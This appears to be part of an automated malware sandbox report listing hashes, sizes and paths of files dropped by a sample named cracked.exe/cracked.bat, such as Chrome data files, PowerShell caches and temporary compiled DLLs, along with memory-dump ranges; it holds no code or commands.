1b48e81acea9850aa70f0561152e131ed713fd7f

SHA256
9a3acfd51431531e4af7424c670a5b4c776bd079ded4f06bb6c1934c977f30f3

SHA512
195a62fb64a07e98720a8e543a50ad631714dceee330f503f03258eb1affa7f8ad7175bb66e43a828b842525e004e2a000ca0adde01761b14a276c01eac9336c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
4cd535543a039a07c8a3ca887350bbd9

SHA1
11af824ee1d8cb052d57d7af516cd3ad1e599098

SHA256
401d15427e059fa900731edce05e46b275a7a746065dd8cbb07e5bc963dccf23

SHA512
f79da19d56204300a01d1cac3654cd9adadeefc1b1a78dc056f05455072af6438306555691f9e8294b6e6142c0c4f403f9632b8f3a32814d308f2718bd2e02df

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
101KB

MD5
df61370918785e808a9e591c1ad18686

SHA1
2371d50126b16c2fc4211140fc7e3e0c374fae2b

SHA256
a577dee7d202d578b6ea117c4e0f04debcb1cdb37e8116db56d59bbe094612b1

SHA512
62760fd28984c2291ce9c231a7c664d2c665cf2e0c9cfec8e979046b68698b3b8d47c0058b4790cfd3d09dfd4d726dce3770ca47864a2de859b43343f352d0e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5c1600.TMP

Filesize
100KB

MD5
d9a8f05e6cbb1a81fd220dc42b0e6a30

SHA1
48f3c4c712565ba2f355db40dce4f35da89b828f

SHA256
a59a5f944f4b8cdc9a8c12550ad5f170080b98e1c15b5a4588dc899bf35fc745

SHA512
8f0b6946b8cfc459705790d91c631ddbdbda24f0a77706ede85acbb6e4ca78cce16e27d6fa32387555cf492ada5c33c0173c01b8498586c867f6016fa7b3c585

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
687ff3bb8a8b15736d686119a681097c

SHA1
18f43aa14e56d4fb158a8804f79fc3c604903991

SHA256
51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

SHA512
047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
af1712df87ed6ee08f4643166628b383

SHA1
e01c97ec5e7f19fe6826e0be261cba63ef5a0d56

SHA256
411440e5c19f0d8e878d28f66cf278b3aa3c3a133bbf6fc86b58c9560f3b8f28

SHA512
22edf730a1e75bd6064ad3424bb2c9089bdff9c8f2db3bdf534ee59010ba0690a9abe01d5c18b5669195188feddc18dbb53d4ae66e4f79111b50d6a7d2ce340c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5D33.tmp

Filesize
1KB

MD5
c088dab258af74b2785374dd07264ac5

SHA1
51535cf8a65c5f255fad92c471cd8a8eb9dc10cb

SHA256
60dc02f901171a6382cca5f651c27bf9ad94ee51ad7e4f017bfd3c43764a3e4d

SHA512
18365df08acbddcd24d0d128a3854a8b73faa6a207c839b02de03504322fd0025e0f5dc540cca48b4825a85420102428e381d0c1513e64e2dcb3fb20a198315f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES630A.tmp

Filesize
1KB

MD5
93fa5e0ada37f43a429a9bd89dab493f

SHA1
25a6647a0080ec770f97d25a6bd1de5315efc902

SHA256
696f514935b4ee6591ad9a23917ca235ec4499f4cf69439d6a637f10409dc5c8

SHA512
e54ea0cb7564ca2db3c092b97e04f4251c5dd3b1b00d0fad379cd80ef0d439acba4f5ffd2530a8ecb3647172f7aed70a71a3ee03c1a7d1e696bdadeaeca93ef3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8604.tmp

Filesize
1KB

MD5
6d33ba31bbb980f62f3335af79ef321c

SHA1
cbec22416e82c12d07201889b826f273605f99cd

SHA256
f15bba7b1adb0d2922e82d38b5d33ebd7e7bc4bfe8361baba9f5a2cff9683567

SHA512
353e35153225b2f5eface615442f256e4e7d86d817d330bfb185f05f7487226aafc061411a03db45f390c9ba64c38bace63c53428343e736178765f9d7f9a4d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEA9E.tmp

Filesize
1KB

MD5
6fc7615b26b8ce0728777eb7aa09b587

SHA1
d2aa86c6d94ef60ac88b5bb7fb0460c367ca0697

SHA256
77dae1b3b045547d260a350fa1471286b3c16df155a12527742969de964bbd2a

SHA512
c217a23e15928588b558150c455c2e25de28caa5a0266b4123ef1b024897fb233c47ee6757757f97347b9c09da2e3556933c28578f45c39cb2c94c73aa799a70

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i3gji0r1.gse.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fvhnaifq\fvhnaifq.dll

Filesize
3KB

MD5
507efe4d0c0b4c001ff78da9382121b4

SHA1
2a408c68c9330a88097a9f54f0db5761261056f4

SHA256
ff54169f607456d145b978b77420df637aa720b249a7e58350fe36fd58bb3116

SHA512
f8c9fd43d1fccef44627aad02e8f6f65a859da92b0b31f91b9e05f82c424690cef40757b04eb51f70860d3c3722a094855f22ab831448ddfeb5c7b37d2ddf106

Download Submit
C:\Users\Admin\AppData\Local\Temp\ov4twx14\ov4twx14.dll

Filesize
3KB

MD5
46a3837f79d1ce19a32dd828ceffb93b

SHA1
e173928462ebf3d97c1f07f400587858608eade9

SHA256
b648127c266e3b7b19770b2774d5b0bca6ac8ab79165ebb1ee0c808423c296ea

SHA512
93dfd4f081f5a8c654e9a539510a68cc5d68ec8e695c748a39ea0e6b77d60217e9979c8f8a05ca8215817e4543aaf5b94fc84e9383c3d724248347d5b08e0a24

Download Submit
C:\Users\Admin\AppData\Local\Temp\pbmxxia4\pbmxxia4.dll

Filesize
3KB

MD5
9bd535216511866a70f3d3204d5b72dc

SHA1
ee45ae0d5640123745a7501e49a8eea74294661f

SHA256
440293358a1897e10bde954b5ec0f8ec6490e80b36bef0f4cad420d3232917bc

SHA512
289ae40783ac9f1af0068baeeb3c2d74ffda8d07b20b4142546b1da58550acfb1232f0cb13d425bfa7d420534d190da65b8a43659c9e4200b790bd6c4fe22e68

Download Submit
C:\Users\Admin\AppData\Local\Temp\phe22u1d\phe22u1d.dll

Filesize
3KB

MD5
d0684a900ebcdb993911c7f705824c8c

SHA1
de909d2b5404348ddb11daa70a232d34ab02f901

SHA256
a6625a4ca7c52bd1a3fb99c86ce054393b2cd0cd7e39d3cabc01561b0d996427

SHA512
ef040c59509fa8c72bac79d129db5f938aa46127380b47c4688a162febe7c7a6f81bad37e825f24e7ef943127d55fd688e36870fd8e31cff2fa342e5fc932aa0

Download Submit
C:\Users\Admin\Downloads\cracked.bat

Filesize
7KB

MD5
0faf0dcf6bcfea3e8eea32841ea0b899

SHA1
40cb3e9c5f30d2a2aec577a0331bef5509caf3b7

SHA256
94f225902bccb30e47fcec65f80f0f3fc74abaa6c3eb145ed7f3e9e6699793bc

SHA512
805781362bacd91140045b57f6e26aff40f0d2da3d09276090be0e30acc13f094c337c1cc1b13175706ad44a38eece3432ec9ec77afb03fcd3dff58a13beefac

Download Submit
C:\Users\Admin\Downloads\cracked.exe

Filesize
72KB

MD5
299c3f54a01dbdc6f77ded01622ba5cc

SHA1
a92b61edac63fe33bda480d3a1f616ce49e3d524

SHA256
12e8a52165f5b9d1c7211b899d1b54babb08fe561f32e6df28091d021e8ac92e

SHA512
f5ddc9afdc9fd4eb0a077d110b2af5ed7900df6226102cb8f3854c032a22da5c650dc94b220da2dce6d0add1b8fa03f5c287749d52555d993dc2634e8f30e814

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fvhnaifq\CSC5DEB56F6345403FAFDEB3922BFD11C2.TMP

Filesize
652B

MD5
5156cbf274732e02d15660b047d98d61

SHA1
427203fa0b3054d5e87a94fe1c2de651312b5d21

SHA256
4226ec06cc26291fd4e22b82304f509cbd39e1099f5ada2c20f26673a8f7cd31

SHA512
9611bbf4d830553ae3b393b4768f31c7b13c1b6b75248cb13e6db2781f9981d45a96eac92026e276c357562fb46b284e0b42d05b48a32ac6eb4cea5ef772b90d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fvhnaifq\fvhnaifq.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fvhnaifq\fvhnaifq.cmdline

Filesize
369B

MD5
9205b53924bbe94a4c5b4d2dc63a07f8

SHA1
9883152c0178dae6bf637eb1c6d62ca696f0d8b6

SHA256
beaa764b0e152d2d32ad82757ffeef15be96d6b7e1d7f0fc32a5507b28f37711

SHA512
3f9da8aa9ff93c5fd4021ed2bcf80cb83e11a3442ae5a9b456adbb9c976fdfd97100f6c12a1bbfc97cd65c3ee9d82efedd236eb6cba33a7c804c2c9e38301d9b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ov4twx14\CSCD112C82F36954465A218B2D199EA560.TMP

Filesize
652B

MD5
4dfe60233f77b51a51c8cec9d2be6f74

SHA1
d2550f1427e0c72d551a03048f01d98cb62b4401

SHA256
f998b8df518c2d38b0c9947704f61905a3d400de7ad63f96e63b981ceebbe840

SHA512
e670838c798bc720c28ebd4637ab989cfc74041744eff874ea5578fe44f114671391afe49b32aa1a676fa08d3cb3d98f043890d4b37f162128cbaa8f8b180b66

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ov4twx14\ov4twx14.cmdline

Filesize
369B

MD5
d059a1130c8fb880a394cbb4219be088

SHA1
cea0bdfba2cd0b42ef77bd197d8c1985a7bc4ebb

SHA256
6c7184a9a226e6c6ca469b871b22835f7f2197565b750208b865b598929df8f7

SHA512
52eed90993db0a2b8b0424fe9410788786cf760b47487f672fdad48d7a93c408c50fcb244648c5fa5778176c6ba17f6857b6fe7c760c17553b8be6a685b97c98

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pbmxxia4\CSC66B8613A35AA475A8926886B1C29A30.TMP

Filesize
652B

MD5
9f11dce5b48043e9ef463bde0f1068ac

SHA1
0d3230cbb9c77d989d97bb6c4490381e701fd136

SHA256
92162eb23c5e7a7b45bce339be380d463beae827c01f3a444893e292fc0c6b4f

SHA512
10bf893f2c188bb42413dcc4996bdeca4590aa9f150be8d3feb051c4102e516de0eda815c170c2de2d0e64eb9f3ed9ac8e7c9583dda978a3821555fac6ea3e78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pbmxxia4\pbmxxia4.cmdline

Filesize
369B

MD5
0ffb6bc3f02355eaf8a40baeefb113c2

SHA1
9cb82a3aa79e288c45bfc8fcd0bda8e2efcf32c6

SHA256
aaa5f77610d18f2697a4032b8beedf5aac07b3e96cbdc16dd21eb4e173f24f24

SHA512
619b16a0b6d3aff13987b94bf714d47c4bce073416f6a134f3cf5cbb8b20fa50b4a93266b94ab846b7d9bd45fcdc8c2efbef6c216d1543e6a3beb3e906e6116d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phe22u1d\CSCBEA742C2D9DD40CBA5F8B951AF97A.TMP

Filesize
652B

MD5
85f471c42571c9be55074ce63a90a716

SHA1
95d0272737df0570091b99f9a86175b3bcfb9c09

SHA256
93ea96ca4b69969f93636925b02c43ffe35990f3503e91a1faff01e817e83fcc

SHA512
585b9165b9a8a90b6b3ced6b02269b809e870e48466c988b64a8a3f58e93e20407593ad28574341020c84a55148aa3ed76566ddb9b3333999d8690ea5b54794a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phe22u1d\phe22u1d.cmdline

Filesize
369B

MD5
3321a463a32547bdb8ce3729a511c906

SHA1
bb1deb79b537c95a4d1afd673816f8ae4a848c00

SHA256
8ff34535b152981af488e2860a72be404f2c0959ee11e6ccd4354008c3ee7fbb

SHA512
226cfba26062d5a5be245d9a5241b4ff2fa0ccc7fbdf7a1e5925ab0aa5be543798a140404c3953f28039e3cef9e0898392d875a42246ea8fe641e5ab4264fbb0

Download Submit
\??\pipe\crashpad_4548_PLGHKXLAHZIEHQTO

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2308-59-0x00007FFCDD0A0000-0x00007FFCDDB61000-memory.dmp

Filesize
10.8MB

Download
memory/2308-54-0x00007FFCDD0A0000-0x00007FFCDDB61000-memory.dmp

Filesize
10.8MB

Download
memory/2308-115-0x00007FFCDD0A0000-0x00007FFCDDB61000-memory.dmp

Filesize
10.8MB

Download
memory/2308-48-0x00007FFCDD0A0000-0x00007FFCDDB61000-memory.dmp

Filesize
10.8MB

Download
memory/4384-62-0x0000000005220000-0x0000000005242000-memory.dmp

Filesize
136KB

Download
memory/4384-75-0x0000000005FE0000-0x0000000005FFE000-memory.dmp

Filesize
120KB

Download
memory/4384-60-0x00000000026B0000-0x00000000026E6000-memory.dmp

Filesize
216KB

Download
memory/4384-93-0x0000000006610000-0x0000000006611000-memory.dmp

Filesize
4KB

Download
memory/4384-91-0x0000000006570000-0x0000000006578000-memory.dmp

Filesize
32KB

Download
memory/4384-78-0x0000000006500000-0x000000000651A000-memory.dmp

Filesize
104KB

Download
memory/4384-77-0x0000000007670000-0x0000000007CEA000-memory.dmp

Filesize
6.5MB

Download
memory/4384-76-0x0000000006010000-0x000000000605C000-memory.dmp

Filesize
304KB

Download
memory/4384-61-0x00000000052F0000-0x0000000005918000-memory.dmp

Filesize
6.2MB

Download
memory/4384-63-0x0000000005920000-0x0000000005986000-memory.dmp

Filesize
408KB

Download
memory/4384-74-0x0000000005A70000-0x0000000005DC4000-memory.dmp

Filesize
3.3MB

Download
memory/4384-66-0x0000000005A00000-0x0000000005A66000-memory.dmp

Filesize
408KB

Download
memory/4992-108-0x00007FFCDD0A0000-0x00007FFCDDB61000-memory.dmp

Filesize
10.8MB

Download
memory/4992-47-0x00007FFCDD0A0000-0x00007FFCDDB61000-memory.dmp

Filesize
10.8MB

Download
memory/4992-46-0x00007FFCDD0A0000-0x00007FFCDDB61000-memory.dmp

Filesize
10.8MB

Download
memory/4992-36-0x0000019FD5A10000-0x0000019FD5A32000-memory.dmp

Filesize
136KB

Download
memory/4992-35-0x00007FFCDD0A3000-0x00007FFCDD0A5000-memory.dmp

Filesize
8KB

Download
memory/5076-221-0x0000000007770000-0x0000000007778000-memory.dmp

Filesize
32KB

Download
memory/5836-262-0x00000000056B0000-0x00000000056B8000-memory.dmp

Filesize
32KB

Download
memory/6012-165-0x0000000007A00000-0x0000000007A08000-memory.dmp

Filesize
32KB

Download